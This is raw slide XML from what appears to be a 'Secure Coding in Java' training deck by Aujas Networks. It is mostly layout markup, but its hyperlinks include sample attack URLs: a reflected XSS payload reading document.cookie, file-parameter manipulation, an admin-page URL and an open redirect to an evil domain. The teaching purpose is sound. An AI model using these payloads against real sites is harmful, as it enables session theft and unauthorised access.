          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="25263"/>
            <a:ext cx="6099048" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="20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239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63712"/>
            <a:ext cx="4040188" cy="44084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1239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63712"/>
            <a:ext cx="4041775" cy="44084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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470650" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0CDFE725-384D-4B3A-B045-F7CA56C29AD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inside_bottom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1588" y="6332538"/>
            <a:ext cx="9144001" cy="525462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 7" descr="inside_top"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6564313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="25263"/>
            <a:ext cx="6099048" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="20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6" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470650" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4508BA5B-FD59-4C46-A39B-05643F00367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inside_bottom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1588" y="6332538"/>
            <a:ext cx="9144001" cy="525462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 7" descr="inside_top"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6564313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470650" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF13876B-AEA8-4886-905B-9CF041F134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descr="inside_bottom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1588" y="6332538"/>
            <a:ext cx="9144001" cy="525462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 7" descr="inside_top"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6564313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="906399"/>
            <a:ext cx="3008313" cy="846201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="18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897576"/>
            <a:ext cx="5111750" cy="5285232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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752600"/>
            <a:ext cx="3008313" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="12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Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470650" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{607D071A-B02D-4029-BCAE-772A9BCDFF3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bg2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1325563"/>
            <a:ext cx="9144000" cy="4541837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 7" descr="logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="341314"/>
            <a:ext cx="2667000" cy="622552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6580188"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved.</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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470650" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FF1FA5AB-A6A2-4051-90D3-D364D4626AC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Aujas Confidential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0CCD526-5F9C-4C01-B269-6AB0E3C1861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vulnerable.site/welcome.html?name=%3cscript%3ealert(document.cookie)%3c/scrip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bank.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example.com/application?file=Kannan.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example.com/application?file=14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bank.com/admin.as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vulnerable.site/welcome.html?name=%3cscript%3ealert(document.cookie)%3c/scrip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vulnerable.site/welcome.html?name=%3cscript%3ealert(document.cookie)%3c/scrip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example.com/boring.jsp?fwd=admin.jsp" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/redirect.jsp?url=evil.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owasp.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.osstmm.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secunia.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://osvdb.org/"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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2097087"/>
            <a:ext cx="4648200" cy="1941513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Secure Coding in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3810000"/>
            <a:ext cx="46482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i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mj-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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-US" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs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 Cross Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
